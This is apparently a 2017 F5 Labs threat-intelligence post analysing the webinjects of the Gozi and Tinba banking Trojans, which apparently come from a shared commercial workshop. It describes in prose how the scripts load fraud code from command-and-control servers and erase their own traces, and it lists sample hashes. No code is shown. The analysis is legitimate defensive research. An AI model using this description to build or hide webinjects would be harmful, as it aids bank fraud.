Webinject crafting is a separate profession now. There are people who write webinjects and sell them to fraudsters, who use them to weaponize Trojans. Based on our analysis of several campaigns of Gozi and Tinba, the malware distributors seem to have bought their webinjects from the same webinjects workshop.
Although those are different malware families attacking mostly different financial institutions, their webinjects seem almost identical. The tiny differences originate from the fact that the malwares report to different fraudsters' servers and have fake HTML content customized for the specific banking targets.
The main structure of this webinject version comprises several scripts that will initialize the BOTID, fetch external scripts that include the main fraud functionality, and remove the script element from the DOM to cover its traces.
Figures 1 and 2 show the identical parts of the script and the differences in the additional scripts fetched from the command-and-control (C&C) server. Notice that the path structure on the C&C server gives a hint about the attacked country. In this example, the Tinba external script URL has a different domain name and geographical target area, "id" (Indonesia). The Gozi external script is also identified by geographical target area, but it is marked as subfolder name "di" (Indonesia).
Analyzing the external scripts with fraud business logic reveals that same resemblance was present in the webinject.
(See Figures 3 and 4.)
The Gozi injection has customized, fake HTML content for a Polish bank, but other than that, most of the variables and functions bear the same names and the same logic.
We expect the complexity of webinjects to increase, along with their roles in successfully committing malicious transactions. This trend is being closely monitored by our researchers. What remains to be seen is whether the "production" of these webinjects, which use shared rather than custom code, increases the risk that more organizations, and smaller organizations, may be attacked.
Sampled Tinba md5: a01412b41e1837754be907d6989472e5
Sampled Gozi md5: e4d8cc25266ae39a5e5e87c7048f15f3
About F5 Labs
F5 Labs combines the application threat intelligence data we collect with the expertise of our security researchers to provide actionable, global intelligence on current cyber threats—and to identify future trends. We look at everything from threat actors, to the nature and source of attacks, to post-attack analysis of significant incidents to create a comprehensive view of the threat landscape. From the newest malware variants to zero-day exploits and attack trends, F5 Labs is where you’ll find the latest insights from F5’s threat intelligence team.
MODIFIED: Jul 06, 2017